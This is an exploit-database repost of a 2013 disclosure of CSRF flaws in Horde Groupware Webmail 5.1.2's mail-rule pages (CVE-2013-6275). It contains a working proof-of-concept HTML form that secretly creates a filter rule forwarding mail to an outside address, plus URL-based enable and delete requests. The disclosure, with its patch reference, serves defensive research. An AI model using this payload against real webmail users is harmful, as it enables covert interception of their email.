Advertisement






Horde Groupware Web Mail Edition 5.1.2 CSRF Vulnerability

CVE Category Price Severity
CVE-2013-6275 CWE-352 Unknown High
Author Risk Exploitation Type Date
EgiX High Remote 2013-10-30
CPE
cpe:cpe:/a:horde:groupware_web_mail:5.1.2
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2013100195

Below is a copy:

#############################
Exploit Title : Multiple CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/25/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail
 
#############################
GroupWare Web mail Edition
 
Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project
 
##########################
CSRF Location
 
Several functionalities from Rules section were found to miss the token so as to prevent CSRF
 
 
##########################
POC
 
A <body>
    <form action="...../horde/ingo/basic.php?page=rule" method="POST">
      <input type="hidden" name="actionID" value="rule_save" />
      <input type="hidden" name="conditionnumber" value="-1" />
      <input type="hidden" name="name" value="TestingCSRF" />
      <input type="hidden" name="combine" value="1" />
      <input type="hidden" name="field[0]" value="From" />
      <input type="hidden" name="match[0]" value="contains" />
      <input type="hidden" name="value[0]"
value="[email protected]" />
      <input type="hidden" name="field[1]" value="" />
      <input type="hidden" name="action" value="4" />
      <input type="hidden" name="actionvalue"
value="[email protected]" />
      <input type="hidden" name="stop" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
These were found at:
  * Creating a rule
  * Updating
  * Enabling
    (http://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=2&actionID=rule_enable)
  * Deleting ( url-based https://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=6&actionID=rule_delete)
 
###########################
CVE identifier
 
CVE-2013-6275.
##########################
Vendor Notification
10/25/2013 to: the developers. They replied immediately and fixed the problem launching a patch:  http://bugs.horde.org/ticket/12796
10/28/2013: Disclosure


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.